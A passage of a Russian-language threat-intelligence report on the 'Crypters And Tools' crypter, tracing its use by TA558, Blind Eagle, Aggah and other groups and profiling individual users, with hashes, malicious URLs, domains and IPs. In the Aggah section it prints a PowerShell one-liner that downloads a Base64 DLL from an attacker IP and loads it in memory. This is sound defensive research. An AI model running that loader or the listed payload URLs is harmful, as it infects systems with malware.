Positive Technologies
PT Expert Security Center

Crypters And Tools. Часть 2: Разные лапы — один клубок

Crypters And Tools. Часть 2: Разные лапы — один клубок

Авторы:

Александр Бадаев

Александр Бадаев

Специалист группы киберразведки Positive Technologies

Елена Фурашова

Елена Фурашова

Стажер группы киберразведки Positive Technologies

Слайдер
Слайдер
Слайдер
Слайдер

Ключевые находки

  • Как минимум шесть известных группировок использовали Crypters And Tools.
  • Часть из них связаны между собой, что мы показали в своем исследовании.
  • Группировка Aggah, которая не упоминалась с 2022 года, до сих пор атакует пользователей по всему миру.
  • Мы смогли установить некоторых пользователей Crypters And Tools.
  • Часть этих пользователей относятся напрямую к группам Blind Eagle и TA558 и являются их членами.

Введение

В первой части мы рассказали о крипторе Crypters And Tools, который мы обнаружили в процессе исследования атак различных группировок. Отчет концентрировался на внутреннем устройстве и инфраструктуре самого криптора. В этой части мы расскажем о хакерских группировках, которые использовали его в атаках, их связях, уникальных особенностях, а также о пользователях Crypters And Tools, некоторые из которых связаны с рассматриваемыми группировками.

Кроме того, исследование показало, что группировка Aggah продолжает совершать атаки, несмотря на то что некоторые исследователи считают, что в 2022 году ее активность прекратилась.

Многие исследователи сталкивались с атаками с использованием Crypters And Tools, принимали особенности криптора (использование Ande Loader, переменная $codigo, сетевая инфраструктура криптора и тому подобные) за что-то уникальное и приписывали их к конкретным атакующим, что мы считаем ошибкой. В конце статьи мы приложили все публичные отчеты, где упоминается Crypters And Tools или его ранние версии — Codigo-крипторы.

Группировки, использующие Crypters And Tools в атаках

Таблица 1. Группировки, использующие Crypters And Tools

TA558Группа, активная по крайней мере с 2018 года, изначально нацелена на индустрию туризма в Латинской Америке, а также на Западную Европу и США, но позже расширила свои атаки на другие регионы. Использует фишинг, стеганографию и вредоносное ПО, такое как Agent Tesla, FormBook и Loda RAT
Blind Eagle (APT-C-36)C 2018 года атакует Южную Америку, особенно Колумбию, а также Эквадор и Испанию. Применяет фишинг и вредоносное ПО, такое как njRAT, BitRAT, AsyncRAT, фокусируясь на государственных и корпоративных целях
Aggah (Hagga)Группа, активная по крайней мере с 2018 года. Проводит фишинговые кампании против различных стран, в основном азиатских, но также была замечена в атаках на Латинскую Америку. Использует различное ПО, включая криптор 3LOSH, RevengeRAT и Agent Tesla. По мнению исследователей, некоторые члены группы имеют пакистанское происхождение
PhaseShiftersГруппа атакует государственные структуры России, Белоруссии и Польши. Использует фишинг, стеганографию и репозитории (GitHub, Bitbucket) для доставки вредоносной нагрузки, а также различное ПО, например Rhadamanthys
UAC-0050Группа, активная по крайней мере с 2020 года, нацелена на украинские, польские и российские госструктуры. Рассылает фишинговые письма, маскируясь под официальные документы, распространяя в основном Remcos RAT, Quasar RAT и Remote Utilities
PhantomControlС июля 2023 года использовала скомпрометированные сайты для распространения ScreenConnect, за которым следует AsyncRAT. В какой-то момент перешла на Ande Loader для доставки SwaetRAT. Возможно, связана с Blind Eagle

Таблица 2. Сводные данные о группировках, использующих Crypters And Tools

Blind EagleTA558AggahPhantomControlPhaseShiftersUAC-0050

География атак

Латинская Америка: Колумбия, Эквадор, Чили, Панама, БразилияЛатинская Америка, Северная Америка, Западная ЕвропаЛатинская Америка, Северная Америка, Западная Европа, Ближний Восток, Восточная АзияN/AРоссия, Белоруссия, ПольшаРоссия, Белоруссия, Польша, Украина, Молдавия, страны Прибалтики

Используемое ВПО

Remcos RAT, Async RAT, njRAT, Quasar RAT, BitRAT, LimeRAT Remcos RAT, Async RAT, XWorm, Lokibot, FormBook, Agent Tesla, RevengeRAT, njRAT, LimeRATRhadamanthys, XWorm, Agent Tesla, Remcos RAT, Warzone RAT, Nanocore RAT, njRAT, AzoRult, Lokibot, RevengeRAT, Async RAT, njRAT, LimeRATAsync RAT, SwaetRAT, ScreenConnectRhadamanthys, DarkTrack RAT, Meta StealerRemcos RAT, Meduza Stealer, Lumma Stealer, Quasar RAT

Язык писем и документов 

Испанский, португальскийИспанский, английский, могут использовать языки атакуемых регионовАнглийский, испанский, могут использовать языки атакуемых регионов N/AРусскийУкраинский, русский, румынский, английский

Использование САТ

2023–20252023–20252021–2023202320242024

В данной статье мы сосредоточились на трех группировках — TA558, Blind Eagle и Aggah, а также на пользователях Crypters And Tools, которые могут быть с ними связаны. Для наглядности покажем часть связей между этими группами в следующей таблице.

Таблица 3. Пересечения между группами

 AggahBlind Eagle
TA558
  • Периодическое использование строки «cdt» на протяжении всех атак
  • Атаки на отели в 2018 году
  • Сходство в использовании ВПО и крипторов (3LOSH, Crypters And Tools)
  • Схожий код скриптов в атаках в 2024 году
  • Использование общей инфраструктуры Crypters And Tools (servidorwindows.ddns.com.br)
  • Основная география атак — Латинская Америка
  • Использование в фишинге испанского языка
  • Схожий инструментарий (AsyncRAT, Remcos RAT и т. п.)
AggahN/A
  • Использование общей инфраструктуры Crypters And Tools (149.56.200.165)
  • Исследователи, упоминали, что возможно группа Aggah — это, возможно, подгруппа Blind Eagle

Все три группы до сих пор активны и совершают множество атак. Aggah в данный момент прекратила использовать Crypters And Tools — или ее атаки находятся вне зоны нашего наблюдения. При этом сама группа активна, и мы расскажем об этом в соответствующем разделе.

В то же время ТА558 и Blind Eagle до сих пор активно пользуются криптором.

Например, в мартовской статье Check Point Research рассказали про атаки группировки Blind Eagle. Мы наблюдали описанную атаку в феврале, и тогда нас привлек IP-адрес 62.60.226[.]64, который Check Point тоже указали в качестве индикатора. На нем располагалось множество файлов, связанных с Crypters And Tools, хотя в конкретной атаке криптор мог не использоваться.

Про атаки Blind Eagle мы также расскажем ниже в разделе про пользователей Crypters And Tools под никами deadpoolstart2025 и ABBAS и их связь с данной группой.

В случае с TA558 примером атаки с использованием Crypters And Tools может послужить фишинговая атака в марте, где использовался следующий файл:

  • Purchase Inquiry.xla (SHA-256: 55ea07bbd700488fd6330d289f210b2da119401a9e27009472d1afec2f6c6339)

В атаке фигурировали URL, типичные для TA558:

  • http://104.168.7.38/xampp/knct/nicefeelingwithbestgoodthinksfor.txt
  • http://104.168.7.38/xampp/knct/Lightgreatloversonhereforlovingpeoplesalot.hta
  • http://104.168.7.38/xampp/knct/Lightgreatloversonhereforlovingpeoplesalot.png

Пользователи Brainiac, syscore и negrocock, связанные с TA558, также будут упомянуты в соответствующем разделе.

Отметим, что TA558 и Blind Eagle не ограничиваются использованием только Crypters And Tools в своих атаках. Например, в апреле 2025 года мы обнаружили типичное письмо TA558.

Рисунок 1. Пример письма TA558

Рисунок 1. Пример письма TA558

Письмо содержало два вредоносных документа, которые скачивали вредоносную нагрузку с сервера с характерным для ТА558 паттерном:

  • http://216.9.224.185/33/eco/goodthingsforbestfeaturesgivenmegoodthingsforbest_______________goodthingsforbestfeaturesgivenme_____________goodthingsforbestfeaturesgivenme.doc 

Далее скачивался и выполнялся goodthingsforbestfeaturesgivenme.vbe, что приводило к заражению жертвы вредоносным ПО Remcos RAT. Crypters And Tools в данной атаке не использовался.

PhaseShifters, UAC-0050 и PhantomControl

В первой части мы уже рассказывали, что вышли на сам Crypters And Tools, когда исследовали группировки PhaseShifters и UAC-0050. Пересечения между этими группировками описаны в одной из наших статей. Группы использовали Crypters And Tools в атаках, но отметим, что мы не обнаружили их явной связи с создателями самого криптора.

Про группу PhantomControl есть только два отчета от компании eSentire. В первом отчете Crypters And Tools не фигурировал, но во втором сказано, что группа стала использовать Ande Loader. В отчете данное ВПО было атрибутировано к группе Blind Eagle, но Ande Loader используется в Crypters And Tools, поэтому прямая атрибуция некорректна. Так, ссылки на paste.ee и изображения, указанные в статье, принадлежат криптору. Поэтому можно точно сказать только то, что группа использовала Crypters And Tools в своих атаках.

Особенности группы TA558 и ее отличия от Blind Eagle

В статьях, показывающих, что исследователи сталкивались с Crypters And Tools, часто возникали ложные связи между группировками из-за отсутствия ранее информации о том, что данный криптор — это отдельная сущность, а не уникальный инструмент какой-то группировки. Примером может служить отчет исследователей из Qi An Xin 2023 года, где они предполагают, что группа Aggah может быть подгруппой Blind Eagle, основываясь на значительном сходстве TTP, частичном пересечении вредоносного ПО, географически близким целям и т. п. Мы не исключаем эту возможность, хотя в предыдущем исследовании мы объяснили упомянутые в статье пересечения использованием Crypters And Tools. Тем не менее при детальном анализе поздних стадий атак отличия TA558 и Blind Eagle начинают проявляться.

В данном разделе мы укажем некоторые особенности TA558 и Blind Eagle, которые позволяют нам их различать. Эти данные позволят нам найти связи между данными группами и некоторыми пользователями Crypters And Tools в соответствующем разделе.

Характерные URL и имена файлов TA558

В атаках TA558 часто встречаются паттерны URL, которые мы не связываем с Crypters And Tools:

  • 103.67.162.213/xampp/gd/kissingagirlissoeasyrecentlyireallyfeelsheismygirlineverwanttohurtherweneverwantotkissher_______ilovehertrulyfromtheheartiloveyou..doc
  • 172.232.175.155/88122/bh/bh.h.h.h.hhhhh.doC
  • 172.234.239.22/990099/gf/l.c.c.c.ccx.doC

Также среди вредоносных файлов TA558 было множество повторяющихся имен и паттернов. Примеры типичных имен файлов ниже:

  • PO-24052800.xls
  • factura 00005111, 005114, 005115.pdf.xlam
  • Orden de compra 4000171682.docx

Вышеуказанные имена относительно уникальны, но стоит отметить, что все же мы видели подобные названия у одного злоумышленника — bukky101, о котором будет сказано далее.

Характерные домены TA558

ТА558, Blind Eagle и Aggah используют различные динамические DNS-сервисы, такие как duckdns.org, 3utilities или us.archive.org. В большинстве случаев эти домены являются доменами Crypters And Tools. Например URL, который мы указывали в качестве инфраструктуры TA558, в одной из версий Crypters And Tools появился внутри самого криптора:

  • http://servidorwindows.ddns.com.br/Files/js.jpeg
Рисунок 2. URL из отчета о TA558, прописанный внутри криптора

Рисунок 2. URL из отчета о TA558, прописанный внутри криптора

При этом в атаках мы встречали использование доменов, очень похожих на домены TA558, и файлов с характерными длинными именами, которые при этом не присутствуют внутри самого Crypters And Tools. Ниже приведены такие домены с повторяющимися буквами внутри названий дней недели:

  • mondayyyyvbsgreeceee.duckdns.org
  • wednesdayyyyyyfile.duckdns.org
  • thursdayyyyyyfileeee.duckdns.org
  • fridayyyyvert.3utilities.com

Различия в инфраструктуре TA558 и Blind Eagle

Blind Eagle использует преимущественно колумбийские ASN, в то время как у TA558 этого замечено не было. Ниже представлена таблица, которая показывает популярные ASN у групп, а также примеры IP-адресов из этих ASN, атрибутированных к TA558 и Blind Eagle.

Таблица 4. Инфраструктура злоумышленников

ГруппаТоп-ASN группыПримеры IP-адресов
Blind EagleColombia Movil179.15.149.222
191.88.255.30
181.134.151.81
181.131.216.73
181.52.105.166
Telmex Colombia
Tigo — UNE
TA558AS-COLOCROSSING192.210.150.33
107.172.148.248
104.168.7.36
149.28.237.172
172.234.217.133
Akamai Connected Cloud
AS-VULTR

Aggah. Новые атаки и связь с TA558

Aggah (Hagga) — это хакерская группировка, нацеленная на кражу информации и проводящая фишинговые кампании по всему миру. Среди распространяемого ВПО — RevengeRAT, Agent Tesla, Nanocore RAT, Warzone RAT, njRAT, AzoRult и другое. Особый элемент в их цепочке атаки — частое использование serverless-инфраструктуры для размещения вредоносной нагрузки, к примеру Blogspot, Pastebin или archive.org. В 2018 году на сайте FreeBuf вышла статья, в которой раскрывается предполагаемая личность, стоящая за группировкой, и говорится о ее пакистанском происхождении.

Ниже показаны некоторые взаимосвязи между группировками TA558 и Aggah на основе открытых источников и прошлых кампаний злоумышленников. Однако для того чтобы утверждать, что это одна и та же группировка, необходимо провести дополнительное исследование. На данном этапе можно предполагать, что Aggah поддерживает связь с TA558, обмениваясь идеями для атак, используемым ВПО и другими инструментами.

Чтобы проиллюстрировать связь Aggah и TA558, нам придется углубиться в первые атаки Aggah, которые описывались еще до получения группировкой своего имени.

Первые упоминания Aggah

Первые атаки группировки можно заметить в 2018 году — вредоносные кампании Roma225 и Operation Commando. Атрибуция этих вредоносных кампаний к группировке показана далее.

Атаки 2018 года

Анализ вредоносной кампании Roma225 представили в декабре 2018 года исследователи из Yoroi. Они описали распространение RevengeRAT через PowerPoint-документы с использованием сервиса Blogspot. Из той статьи стоит запомнить два важных факта — метаданные распространяемого документа (автор C.D.T Original) и использование символов «CDT» в переменных кода.

Рисунок 3. Метаданные распространяемого документа

Рисунок 3. Метаданные распространяемого документа

Рисунок 4. Вредоносный скрипт с символами «CDT» (источник: отчет компании Yoroi)

Рисунок 4. Вредоносный скрипт с символами «CDT» (источник: отчет компании Yoroi)

На тот момент Aggah еще не получила свое имя, но пока отметим, что TA558 впервые упоминается в исследовании компании Proofpoint в том же 2018 году. Более того, эксперты в исследовании упоминают те же метаданные и сетевые индикаторы компрометации, что были в кампании Roma225: автор документа C.D.T Original и домен cdtmaster[.]com, — однако никакой взаимосвязи между Roma225 и TA558 не было отмечено.

Рисунок 5. Упоминание метаданных в статье Proofpoint

Рисунок 5. Упоминание метаданных в статье Proofpoint

Рисунок 6. Упоминание вредоносного домена в статье Proofpoint

Рисунок 6. Упоминание вредоносного домена в статье Proofpoint

Атаки 2019 года

В марте 2019 года у Unit 42 (подразделение Palo Alto Networks) вышла статья про кампанию Operation Сomando, направленную на отели. Они имела ряд сходств с кампанией Roma225, которые показаны в таблице ниже. На их основе можно сделать вывод, что обе описанные кампании принадлежат одной и той же хакерской группировке, которая на тот момент пока еще тоже не получила название Aggah.

Таблица 6. Сравнение доменов в двух кампаниях

Unit 42 — Operation ComandoYoroi — Roma225

Dropurls

minhacasaminhavidacdt.blogspot[.]comminhacasaminhavidacdt.blogspot[.]com
internetexplorer200[.]blogspot[.]compocasideiascdt.blogspot[.]com
 cdtmaster[.]com.br

C2

systenfailued.ddns[.]com[.]brsysten32.ddns[.]net
office365update[.]duckdns[.]orgoffice365update[.]duckdns.org
cdtoriginal[.]ddns[.]net 

В 2019 году атаки на отели продолжались и в исполнении TA558, но явных пересечений пока не было.

Hagga == Aggah. Рождение названия

В апреле 2019 года Unit 42 выпускает статью, которая называется «Aggah Campaign». Там описывались атаки с использованием ВПО RevengeRAT и легитимных сервисов Pastebin, Blogspot, Bit.ly. Тогда вредоносная кампания получила свое название из-за слова «hagga», используемого в конфигурации ВПО. Такую же строку содержало и имя пользователя на сайте Pastebin. Но главное в этой статье — показанные в ней пересечения с прошлым исследованием:

  • Название мьютекса с ошибкой в слове «System32» — RV_MUTEX-WindowsUpdateSysten32,
  • Использование ключей oldman, steve, hagga, roma225 в конфигурации RevengeRAT,
  • Сетевые индикаторы из предыдущих атак: office365update.duckdns[.]org, systen32.ddns[.]net.
Рисунок 7. Конфигурация RevengeRAT с ключом hagga (источник: отчет Unit 42)

Рисунок 7. Конфигурация RevengeRAT с ключом hagga (источник: отчет Unit 42)

Таким образом, именно Aggah стояли за Roma225 и Operation Comando.

Один из самых интересных фактов — использование в атаках идентификатора HOTEIS NOVOS («новые отели» в переводе с португальского). Эта деталь примечательна тем, что группа ТА558 в это же время проводила атаки на отели с вредоносными письмами и документами также на португальском.

Рисунок 8. Конфигурация RevengeRAT с португальским идентификатором (источник: отчет Unit 42)

Рисунок 8. Конфигурация RevengeRAT с португальским идентификатором (источник: отчет Unit 42)

Атаки 2020–2022 годов

В 2019–2021 годах Aggah распространяли AzoRult, используя свою панель управления — ManaTools. Слово «mana» будет часто встречаться — в метаданных документов и доменах. В одном из следующих разделов мы покажем потенциальную связь между Aggah и Crypters And Tools, основываясь среди прочего и на этом факте.

Рисунок 9. Панель управления ManaTools

Рисунок 9. Панель управления ManaTools

Примеры доменов, используемые группировкой Aggah в 2019 году:

  • mastermana1.serveirc[.]com
  • mastermana2.serveirc[.]com
  • mastermana3.serveirc[.]com
  • mastermana4.serveirc[.]com
  • mastermana5.serveirc[.]com
Рисунок 10. Метаданные из вредоносных документов в атаках Aggah

Рисунок 10. Метаданные из вредоносных документов в атаках Aggah

За период 2020–2022 годов мы заметили следующие интересные связи между TA558 и Aggah:

  • Схожая география атак: Латинская Америка и Западная Европа.
  • Схожие наборы ВПО; к примеру, обе группы использовали Remcos RAT, RevengeRAT и AzoRult.
  • В 2021 году адрес 3.218.4.249 использовался обеими группами для размещения вредоносной нагрузки.
  • Обе группы в своих доменах используют символы «cdt»:
    • warzonecdt[.]duckdns[.]org (ТА558, источник: Proofpoint),
    • ccnewcdt[.]duckdns[.]org (Aggah, один из доменов, который разрешался в 192.154.226[.]47, источник: Team Cymru).
  • Общие метаданные и сходства в макросах вредоносных документов. 
Рисунок 11. Код макросов документов Aggah (слева) и TA558 (справа)

Рисунок 11. Код макросов документов Aggah (слева) и TA558 (справа)

Рисунок 12. Авторы встроенных OLE-объектов Aggah (слева) и TA558 (справа)

Рисунок 12. Авторы встроенных OLE-объектов Aggah (слева) и TA558 (справа)

Атаки 2023–2025 годов

Хотя, если судить по публичным отчетам, активность Aggah не проявлялась с конца 2022 года, мы нашли некоторые данные, свидетельствующие о том, что группировка все еще продолжает свою деятельность.

В ходе поиска новой активности группировки мы нашли файлы, которые по стилю кода и характерным признакам напомнили предыдущие атаки Aggah. Дальнейшее исследование показало, что они связаны с фишинговой кампанией MEME#4CHAN, описанной в отчете Securonix в 2023 году. Хотя в отчете эта кампания не была атрибутирована к конкретной группировке, обнаруженные нами совпадения позволяют предположить, что за ней стояла именно Aggah.

При сравнении атак обнаружилось несколько ключевых признаков, характерных для прошлых операций Aggah:

  • Тематика писем — гостиничный бизнес и туристическая сфера. Несмотря на популярность этой темы в фишинге, Aggah неоднократно использовали ее ранее. Более того, названия документов встречались как на английском, так и на португальском (аналогично атакам 2019 года).
  • Использование serverless-инфраструктуры: Blogspot, MediaFire, usrfiles. 
  • Стиль кода: во многих атаках код, похоже, писался вручную, с нестандартными, порой ироничными названиями переменных, а также с использованием слов на языке урду. Этот момент важен, так как выше мы уже упоминали возможное пакистанское происхождение участников группы Aggah.

Особый интерес вызывает один из PowerShell-скриптов, в котором присутствует переменная $ALLSAVEBACKUP, содержащая ссылку на Blogspot-страницу backuphotelall.blogspot[.]com, а также характерный комментарий, который будет повторяться в дальнейших атаках Aggah. 

Рисунок 13. Часть PowerShell-скрипта (источник: отчет компании Securonix)

Рисунок 13. Часть PowerShell-скрипта (источник: отчет компании Securonix)

Рисунок 14. Комментарий (источник: отчет компании Securonix)

Рисунок 14. Комментарий (источник: отчет компании Securonix)

Этот Blogspot использовался для загрузки вредоносных файлов, которые затем можно было найти и на других Blogspot-страницах, а также в хранилищах Bitbucket. Одним из таких файлов был all.txt, доступный по следующим ссылкам:

https://bitbucket[.]org/!api/2.0/snippets/nikkerkhan/5qkMXX/c193c8cd66ad1405f4a0ebc7293d71d0f287eb98/files/all.txt
https://backuphotelall.blogspot[.]com/atom.xml
https://otherbusinesssep23.blogspot[.]com/atom.xml
https://backupalllogsmay23.blogspot[.]com/atom.xml
https://hotelbackuppowaug.blogspot[.]com/atom.xml
https://otherbizzunus.blogspot[.]com/atom.xml

По ним можно найти атаки после кампании MEME#4CHAN. К примеру, страница hotelbackuppowaug.blogspot[.]com использовалась в файле lnvoice 1882936796.js, код которого имел комментарии, схожие с предыдущими атаками (полный разбор можно посмотреть на AnyRun).

Рисунок 15. Атака Aggah с использованием Agent Tesla

Рисунок 15. Атака Aggah с использованием Agent Tesla

Рисунок 16.1. Часть PowerShell-скрипта из атаки (сентябрь 2023 г.)

Рисунок 16.1. Часть PowerShell-скрипта из атаки (сентябрь 2023 г.)

Рисунок 16.2. Часть PowerShell-скрипта из атаки (февраль 2023 г.)

Рисунок 16.2. Часть PowerShell-скрипта из атаки (февраль 2023 г.)

Исследование подобных атак привело нас к кампании, начавшейся в конце 2023 года. В этот период Aggah начали распространять вредоносные файлы на тему налогов и счетов, содержащие XWorm или Agent Tesla. Использование Blogspot и Bitbucket сохранилось, а код скриптов изменился несущественно.

Пример файла из этой кампании: Robert_Michael_Tax_2023.js. Этот обфусцированный JavaScript-файл обращается к хранилищу Bitbucket kimkardaikehsi и загружает Agent Tesla. Можно заметить схожесть кода с предыдущими примерами.

Рисунок 17. Часть PowerShell-скрипта из атаки (июнь 2024 г.)

Рисунок 17. Часть PowerShell-скрипта из атаки (июнь 2024 г.)

А в сетевых индикаторах можно увидеть использование словосочетаний «cpa» и «mana»:

manablack.duckdns[.]org
cpamay2024.duckdns[.]org
cpanewminemay24.duckdns[.]org

В 2025 году атаки Aggah продолжаются, но основной вредоносной нагрузкой теперь стали Rhadamanthys и XWorm. Типичная цепочка заражения начинается с обфусцированного JavaScript-файла (названия часто связаны с налогами или формами отчетности), который в итоге приводит к выполнению PowerShell-кода (рис. 18).

Рисунок 18. PowerShell-код, выполняющийся после открытия JavaScript-файла

Рисунок 18. PowerShell-код, выполняющийся после открытия JavaScript-файла

При обращении к Blogspot происходит редирект на Bitbucket, откуда загружается финальный PowerShell-скрипт, устанавливающий вредоносное ПО на устройство жертвы. Стоит отметить, что в некоторых случаях перед загрузкой вредоносной нагрузки происходит дополнительная проверка геолокации, что позволяет атакующим подбирать соответствующие версии вредоносных программ в зависимости от региона. Примеры заражения с использованием XWorm и Rhadamanthys можно найти в отчетах AnyRun.

Рисунок 19. Проверка геолокации

Рисунок 19. Проверка геолокации

Очередные пересечения Aggah с TA558

В 2024 году исследователь IdaNotPro опубликовал разбор одного из файлов, использованных в атаках TA558, под заголовком «TA558 Targeting Brazil». В кампании вновь фигурировали фишинговые письма и вредоносные документы, связанные с гостиничным бизнесом, а также C2-домены с cdt — элемент, который встречается в инфраструктуре как TA558, так и Aggah.

При сравнении разбираемого исследователем файла с атаками Aggah мы нашли некоторые интересные совпадения. Вот несколько основных:

  • Стадия с PowerShell-скриптом, скачиваемым с detail-booking.com[.]br похожа на таковую в атаках Aggah. Например, использование функции kimkarden у ТА558, а со стороны Aggah — Bitbucket kimkardaikeshi. Кроме того, если сравнить код, можно заметить определенные сходства.
Рисунок 20. Слева код Aggah (MD5: 11117203c6f2c96f6b78fd19bc27e49c), справа код TA558 (MD5: c90688783f910b2b4165e2263012e19b)

Рисунок 20. Слева код Aggah (MD5: 11117203c6f2c96f6b78fd19bc27e49c), справа код TA558 (MD5: c90688783f910b2b4165e2263012e19b)

  • Некоторые файлы, связанные с доменом detail-booking.com[.]br, который использовала ТА558, имели имена, схожие с именами тех, которые использовала Aggah.
Рисунок 21. Файлы, связанные с доменом detail-booking.com[.]br

Рисунок 21. Файлы, связанные с доменом detail-booking.com[.]br

Рисунок 22. Конфигурация одного из файлов (<a style="text-decoration: underline;" href="https://tria.ge/230812-fxsm2aab74" target="_blank">tria.ge</a>)

Рисунок 22. Конфигурация одного из файлов (tria.ge)

Сравнение атак Aggah с кампаниями TA558, несмотря на сходства в инфраструктуре и методах, не позволяет однозначно утверждать, что это одна и та же группировка. Тем не менее оно демонстрирует, что группировки могут обмениваться инструментами, идеями и ресурсами.

Использование Crypters And Tools группой Aggah

В разделе про атаки Aggah в 2020–2022 годах мы упоминали использование этой группой панели управления ManaTools. В 2021 году Aggah начала использовать криптор 3LOSH и FsocietyAndTools — одну из более ранних версий Crypters And Tools. При анализе атак за 2021 и 2022 годы мы заметили несколько интересных деталей, указывающих на связь Aggah и Codigo-крипторов. Например, обнаруженный нами IP-адрес 198.50.177[.]251 использовался как хостинг для нескольких ресурсов, включая директорию mastermana, содержащую файлы для атак группы Aggah, а также учетную запись, принадлежащую разработчику криптора nodetecton (использовалась в цепочке запуска криптора).

-windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://nodetecton@198.50.177.251/dll/1.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.85618406295/anamretsam/152.771.05.891//:ptth'))"

Помимо этого, как было сказано раннее, в 2019–2021 годах исследователи заметили использование разработанной Aggah панели управления Mana Tools в атаках группы. Среди атак 2022 года была обнаружена атака с использованием ВПО XWorm, в которой в качестве C2-канала использовался Telegram-бот, с которым коммуницировал аккаунт @mastermana.

Рисунок 23. Telegram-аккаунт @mastermana

Рисунок 23. Telegram-аккаунт @mastermana

Поиск упоминаний Telegram-аккаунта приводит к YouTube-каналу «Tiny Technology», на котором содержатся демонстрационные видеоролики о работе различных эксплойтов. В большинстве видеороликов используется логотип Mana Tools, но есть там и более интересные детали:

  • Имена пользователей на компьютере и виртуальных машинах (Master MANA, 007 и другие).
  • Использование репозитория hogya в Bitbucket, который фигурировал до этого в атаках Aggah (рис. 24).
  • Интерфейс криптора Crypters And Tools, на котором присутствуют логотипы обоих инструментов, что наводит на мысль о возможной связи или коллаборации (рис. 25).
  • Присутствие Crypters And Tools в системе злоумышленника в 2023 году (рис. 26).
Рисунок 24. Создание файла в репозитории hogya (скриншот видеодемонстрации)

Рисунок 24. Создание файла в репозитории hogya (скриншот видеодемонстрации)

Рисунок 25. Совместная работа с Crypters And Tools (скриншот видеодемонстрации)

Рисунок 25. Совместная работа с Crypters And Tools (скриншот видеодемонстрации)

Рисунок 26. Использование Crypters And Tools группировкой Aggah в 2023 году (скриншот видеодемонстрации)

Рисунок 26. Использование Crypters And Tools группировкой Aggah в 2023 году (скриншот видеодемонстрации)

Пользователи Crypters And Tools и их связи с группировками

Как было сказано в первой части, максимальное число активных пользователей криптора, которое мы обнаружили, было 42 (на момент 26 ноября 2024 года). При этом стоит отметить, что в списке присутствовали администраторы сервиса, пользователи с разными никами, но одинаковым HardwareID, а также тестовые пользователи. То есть реальное количество активных подписчиков криптора было меньше.

Среди них мы нашли несколько интересных пользователей.

bukky101

В базе данных нас заинтересовал следующий пользователь.

Рисунок 27. Информация из базы данных о пользователе bukky101

Рисунок 27. Информация из базы данных о пользователе bukky101

Про этого пользователя рассказывали специалисты eSentire в своей статье, посвященной фишинговым атакам с использованием Ande Loader, которое приводило к заражению стилером 0bj3ctivity. В статье исследователи рассказали, что после заражения данные отправлялись Telegram-боту. Владельцем бота был пользователь bukky101. С учетом всех текущих знаний мы понимаем, что в атаке, описанной в статье, bukky101 использовал Crypters And Tools.

Мы проанализировали этого пользователя и его атаки. Например, в мае 2024 года злоумышленник использовал в атаке Agent Tesla (SHA-256: 5a8794fa12ff401f9f7212e497d5d877010f493e3bb028abd54cb12f60fc550f). Данные отправлялись на SMTP-сервер злоумышленника boydjackson[.]org. Интересно, что злоумышленник использовал пароль Bukky101@. Одну из атак исследователи подробно описали в своей статье.1

1Платформа Medium заблокирована на территории России. 

Во время исследования мы обнаружили множество жертв в разных странах, которые подверглись атаке. Список стран следующий: Армения, Греция, Индия, Ирак, Италия, Кипр, Колумбия, Малайзия, ОАЭ, Пакистан, Саудовская Аравия, Сингапур, Турция. Жертвы были из совершенно разных отраслей и какого-то общего паттерна в том, кого атаковал Bukky101, видно не было.

В одной из атак злоумышленник запустил вредоносное ПО на своем компьютере, это позволило получить полезную информацию, включая:

  • содержимое буфера обмена;
  • список установленных приложений;
  • информацию об системе, включая IP-адрес, сведения о наличии антивирусов, эмуляторов и песочниц;
  • ключи Windows;
  • историю браузеров;
  • историю скачиваний;
  • топ посещенных сайтов;
  • информацию о сессиях, например Telegram и Skype;
  • списки Wi-Fi-подключений с именами и паролями.

Таким образом мы точно выяснили, что злоумышленник Bukky101 из Нигерии. Об этом говорит не только IP-адрес, но и использование услуг оператора Airtel Nigeria.

Помимо этого, мы обнаружили, что хакер массово посылал письма в различные страны. По состоянию на февраль 2025 года злоумышленник послал более 6160 различных писем в разные страны. Приведем темы нескольких таких писем, демонстрирующие различие тем для фишинга:

  • DETAIL OF H Sale order # 128578 (PAKISTAN.PACKAGES)
  • Position for the Head of IT / Manager IT
  • Прайс лист на продукцию
  • محاكم راس الخيمة إعلان:3100134384
  • [Gabrini Cosmetics]: New order #80464
  • Re: Proposal of Stall Design and Fabrication for AAHAR Expo 04-08 March 2025 (New delhi)
  • ✅ Нов термин за работилница: Последни измени на Законот за јавни набавки, актуелни теми и предизвици
  • Atașez și poze cu , coletul ce mi-a ajuns , și factura lângă
  • Factura fiscala cutii carton_22.11.2024
  • Dit verandert er in de tarieven en voorwaarden op ons platform
  • REQUEST FOR PROPOSAL FOR WORLD VISION ZIMBABWE
Рисунок 28. Пример письма от bukky101

Рисунок 28. Пример письма от bukky101

Большинство писем содержали HTML-документы с уже введенным логином потенциальной жертвы. Как только пользователь вводит пароль в форму, выдается ошибка, что пароль не действителен, и в то же время посылается запрос Telegram-боту, но принадлежащему уже другому пользователю — @Gfcafmin.

Рисунок 29. HTML-документ с введенным bukky101 логином

Рисунок 29. HTML-документ с введенным bukky101 логином

Также мы обнаружили открытую директорию, принадлежащую пользователю bukky101 с IP-адресом 37.49.228.234, которая упоминалась в соцсети X.

Рисунок 30. Открытая директория сервера 37.49.228.234, принадлежащая bukky101

Рисунок 30. Открытая директория сервера 37.49.228.234, принадлежащая bukky101

Во время изучения bukky101 мы обнаружили, что он сотрудничает с множеством людей из теневого сообщества. Так, один из тех, кто сотрудничал с bukky101, использовал сервер 185.38.142.224 для отправки вредоносных писем по всему миру. По нашим данным, с этого IP-адреса было отправлено по крайней мере 60 300 писем в течение суток.

Одно из этих писем выглядело следующим образом.

Рисунок 31. Вредоносное письмо от одного из сообщников bukky101

Рисунок 31. Вредоносное письмо от одного из сообщников bukky101

При нажатии на ссылку происходит скачивание JavaScript-файла со следующего сайта:

  • https://21ninety.info/file/Purchase-Order.js 

Этот скрипт скачивал данные с paste.ee, а затем обращался через API на сервер Crypters And Tools для получения дальнейшей нагрузки:

  • 3005.filemail.com/api/file/get?filekey=

Впоследствии данные выгружались в Telegram-бот, принадлежащий пользователю To The World Master Solution — @Mastersolution2.

Ранее исследователи отмечали связь группировки Aggah с киберпреступниками из Нигерии, которые заимствовали у нее инструментарий. Это наблюдение частично соотносится с описанными выше фактами.

Blind Eagle: deadpoolstart2025 и ABBAS

